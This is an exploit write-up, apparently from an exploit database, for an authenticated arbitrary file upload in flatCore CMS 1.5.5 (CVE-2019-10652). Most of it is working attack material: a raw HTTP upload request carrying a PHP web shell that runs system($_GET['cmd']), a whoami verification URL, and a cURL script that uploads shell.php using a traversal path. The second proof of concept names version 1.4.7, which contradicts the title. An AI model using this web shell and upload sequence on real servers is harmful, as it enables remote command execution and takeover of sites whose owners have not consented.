flatCore 1.5.5 - Arbitrary File Upload

# Exploit Title: flatCore 1.5.5 - Arbitrary File Upload
# Date: 2024-10-26
# Exploit Author: CodeSecLab
# Vendor Homepage: https://github.com/flatCore/flatCore-CMS
# Software Link: https://github.com/flatCore/flatCore-CMS
# Version: 1.5.5
# Tested on: Ubuntu Windows
# CVE : CVE-2019-10652
PoC：
1)
1. Access the flatCore Admin Panel
URL: http://flatcore/acp/acp.php
Log in with valid administrative credentials.
2. Upload a Malicious PHP File
Navigate to the upload section where you can add new files or images. This is usually accessible via the "Media" or "Addons" feature in the admin panel.
3. Intercept and Modify the Upload Request
Using a tool like Burp Suite or by modifying the request directly, prepare the following POST request:

POST /acp/core/files.upload-script.php HTTP/1.1
Host: flatcore
Content-Type: multipart/form-data; boundary=---------------------------735323031399963166993862150
Content-Length: <calculated length>
Cookie: PHPSESSID=<valid_session_id>

-----------------------------735323031399963166993862150
Content-Disposition: form-data; name="file"; filename="exploit.php"
Content-Type: application/octet-stream

<?php
// Simple PHP backdoor code
echo "Vulnerable File Upload - PoC";
system($_GET['cmd']);
?>
-----------------------------735323031399963166993862150
Content-Disposition: form-data; name="upload_destination"

../content/files
-----------------------------735323031399963166993862150
Content-Disposition: form-data; name="csrf_token"

<valid_csrf_token>
-----------------------------735323031399963166993862150
Note: Replace <valid_session_id> and <valid_csrf_token> with values from your authenticated session.
4. Verification
After uploading, the PHP file should be accessible at: http://flatcore/content/files/exploit.php
Access the uploaded file: http://flatcore/content/files/exploit.php?cmd=whoami

PoC 
2)
# PoC to exploit unrestricted file upload vulnerability in flatCore 1.4.7
# Target URL: http://flatcore/
# The attacker must be authenticated as an administrator to exploit this vulnerability

# Step 1: Log in as an administrator and obtain the CSRF token
# You need to obtain the CSRF token manually or through a script since the token is required for the file upload.

# Step 2: Upload a malicious PHP file using the file upload feature

# Create a PHP reverse shell or any arbitrary PHP code and save it as shell.php
echo "<?php phpinfo(); ?>" > shell.php

# Upload the PHP file using cURL
curl -X POST "http://flatcore/acp/core/files.upload-script.php" \
    -H "Content-Type: multipart/form-data" \
    -F "[email protected]" \
    -F "csrf_token=YOUR_CSRF_TOKEN_HERE" \
    -F "upload_destination=../content/files" \
    -F "file_mode=overwrite" \
    -b "PHPSESSID=YOUR_SESSION_ID_HERE"

# Replace YOUR_CSRF_TOKEN_HERE and YOUR_SESSION_ID_HERE with valid CSRF token and PHPSESSID

# Step 3: Access the uploaded malicious PHP file
echo "Visit the following URL to execute the uploaded PHP file:"
echo "http://flatcore/content/files/shell.php"

This PoC demonstrates how an attacker can exploit the unrestricted file upload vulnerability to upload a PHP file and execute it on the server.
[Replace Your Domain Name]